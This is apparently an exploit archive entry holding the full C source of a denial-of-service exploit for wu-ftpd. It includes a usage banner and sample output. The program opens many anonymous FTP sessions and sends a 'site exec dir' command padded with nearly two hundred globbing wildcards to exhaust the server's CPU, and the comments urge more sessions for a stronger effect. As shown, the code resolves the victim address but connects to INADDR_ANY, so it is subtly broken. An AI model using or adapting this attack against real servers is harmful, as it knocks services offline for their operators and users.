Exploit for wu-ftpd that makes use of the globbing denial of service flaw.
77b446fb929c57c3b6eb8452ee7f7f4034c86535094cd0eb6f01b548f2c92aea
/*
* Exploit for wu-ftpd all versions by pi3 (pi3ki31ny).
*
* How to use? To saw effect you can run only one process this exploit. Example:
*
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# cc p_wu.c -o p_wu
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu
*
*
* ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
*
* [*] Ussage: ./p_wu [options]
*
* Options:
*
* -v <victims hostname>
* -o [ port - standard -> 21 ]
* -l [ login - standard -> ftp ]
* -p [ password - standard -> daj@na.wino ]
* -i [ how many connections - standard -> 15 ]
* -c [ directory - standard -> don't change ]
* -h This stupid help screen...
*
*
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu -v 0
*
*
* ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::...
*
* [*] Connected to: 0
* [*] Banner: 220 darkstar.example.net FTP server (Version wu-2.6.2(1) Fri Oct 22 02:54:53 CEST 2004) ready.
* [*] Sending USER: ftp... OK!
* [*] Sending PASS: daj@na.wino... OK!
* [*] Sending evil command... OK! < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 >
*
*
* root@dpi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ps aux |grep ftpd
* ftp 1592 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1594 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1596 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1598 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1600 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1602 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1604 6.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1606 6.7 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1608 6.5 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1610 6.3 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1612 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1614 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1616 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1618 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* ftp 1620 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost:
* root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd#
*
* And what we can saw wu-ftpd ate all free CPU power... but this do only 15 connections.
* Very good effect i have with running ~20 - ~30 sesion after that my system will
* work very slow (i can't do in practical nothink! - use option -i to change how many times sploit
* will be connect to server and use bug).
*
* Btw. Try always to change directory where is more files / directories it's better for sploit ;-)
*
* Ok. Thanks for read this shit and let's go to ate CPU power! ;-)
*
* Special greetz: appelast
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
* ...::: -=[ www.pi3.int.pl ]=- :::...
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <getopt.h>
#define TRUE 1
#define FALSE 0
#define FAL_EX -1
#define BUFS 210
#define PORT 21
#define LOGN "ftp"
#define PASS "daj@na.wino"
#define SA struct sockaddr
#define pi3 TRUE
int vrfy(int mode, char *ans) {
if (mode == 1) {
if(!strncmp(ans, "331", 3))
return TRUE;
else
return FALSE;
}
if (mode == 2) {
if(!strncmp(ans, "230", 3))
return TRUE;
else
return FALSE;
}
if (mode == 3) {
if(!strncmp(ans, "200", 3))
return TRUE;
else
return FALSE;
}
if (mode == 4) {
if(!strncmp(ans, "250", 3))
return TRUE;
else
return FALSE;
}
}
void ussage(char *arg) {
printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
printf("\n\t\t[*] Ussage: %s [options]\n\n",arg);
printf("\tOptions:\n\n");
printf("\t\t-v <victims hostname>\n");
printf("\t\t-o [ port - standard -> 21 ]\n");
printf("\t\t-l [ login - standard -> ftp ]\n");
printf("\t\t-p [ password - standard -> daj@na.wino ]\n");
printf("\t\t-i [ how many connections - standard -> 15 ]\n");
printf("\t\t-c [ directory - standard -> don\'t change ]\n");
printf("\t\t-h This stupid help screen...\n\n\n");
exit(FAL_EX);
}
int main(int argc, char *argv[]) {
char buf[BUFS],line[100],tmp_buf[200],*login=LOGN,*pass=PASS,*victim=NULL,*cwd=NULL;
long inet;
int pid,sockfd,i,port=PORT,opt=FALSE,ret_vrfy=FALSE,tmp,howmuch=15;
struct sockaddr_in servaddr;
struct hostent *h;
if (argc<2)
ussage(argv[FALSE]);
while((opt = getopt(argc,argv,"v:o:l:p:c:i:h")) != FAL_EX) {
switch(opt) {
case 'v':
victim=optarg;
if ( (h=gethostbyname((char*)optarg)) == NULL) {
printf("Gethostbyname() field!\n");
exit(FAL_EX);
}
memcpy (&inet, h->h_addr, 4);
break;
case 'o':
port=atoi(optarg);
break;
case 'l':
login=optarg;
break;
case 'p':
pass=optarg;
break;
case 'c':
cwd=optarg;
break;
case 'i':
howmuch=atoi(optarg);
break;
case 'h':
default:
ussage(argv[FALSE]);
break;
}
}
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
bzero(buf,sizeof(buf));
strcpy(buf,"site exec dir ");
for (i=FALSE;i<192;i++)
buf[14+i] = '*';
strcat(buf,".*\n");
for (tmp=FALSE;tmp<howmuch;tmp++) {
if ( (sockfd=socket(AF_INET,SOCK_STREAM,FALSE)) <FALSE ) {
printf("Socket() error!\n");
exit(FAL_EX);
}
if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) <FALSE ) {
printf("Connect() error!\n");
exit(FAL_EX);
}
if (tmp==FALSE) {
printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \
]=- :::...\n");
printf("\n\t[*] Connected to: %s\n",victim);
}
bzero(tmp_buf,sizeof(tmp_buf));
i=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host baner...\nExiting...\n\n");
exit(FAL_EX);
}
tmp_buf[strlen(tmp_buf)-1]='\0';
if (tmp==FALSE)
printf("\t[*] Banner: %s\n",tmp_buf);
bzero(tmp_buf,sizeof(tmp_buf));
snprintf(tmp_buf,sizeof(tmp_buf),"USER %s\n",login);
if (tmp==FALSE)
printf("\t[*] Sending USER: %s... ",login);
i=FALSE;
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host login...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
if ( (ret_vrfy=vrfy(TRUE,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
if (tmp==FALSE)
printf("\t\tOK!\n");
i=FALSE,bzero(tmp_buf,sizeof(tmp_buf));
snprintf(tmp_buf,sizeof(tmp_buf),"PASS %s\n",pass);
if (tmp==FALSE)
printf("\t[*] Sending PASS: %s... ",pass);
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host password...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
if ( (ret_vrfy=vrfy(TRUE+1,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 230!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if (tmp==FALSE)
printf("\tOK!\n");
if (cwd!=NULL) {
snprintf(tmp_buf,sizeof(tmp_buf),"CWD %s\n",cwd);
if (tmp==FALSE)
printf("\t[*] Changing directory: %s... ",cwd);
if ( (i=write(sockfd,tmp_buf,strlen(tmp_buf))) == FAL_EX) {
printf("I can\'t write to source host change directory...\nExiting...\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if ( (i=read(sockfd,tmp_buf,sizeof(tmp_buf))) == FAL_EX) {
printf("I can\'t read from source host...\nExiting...\n\n");
exit(FAL_EX);
}
if ( (ret_vrfy=vrfy(TRUE+3,tmp_buf)) == FALSE) {
printf("Error! server don\'t answer with code 250!\n(if it\'s normal \
ignore this in source code!)\n\n");
exit(FAL_EX);
}
bzero(tmp_buf,sizeof(tmp_buf)),i=FALSE,ret_vrfy=FALSE;
if (tmp==FALSE)
printf("\tOK!\n");
}
if (tmp==FALSE)
printf("\t[*] Sending evil command...");
if ( (i=write(sockfd,buf,strlen(buf))) == FAL_EX) {
printf("I can\'t write to source host evil command...\nExiting...\n\n");
exit(FAL_EX);
}
if (tmp==FALSE)
printf("\t\tOK! < %d",tmp+1);
if (tmp!=FALSE)
printf(" %d",tmp+1);
}
printf(" >\n\n\n");
return pi3;
}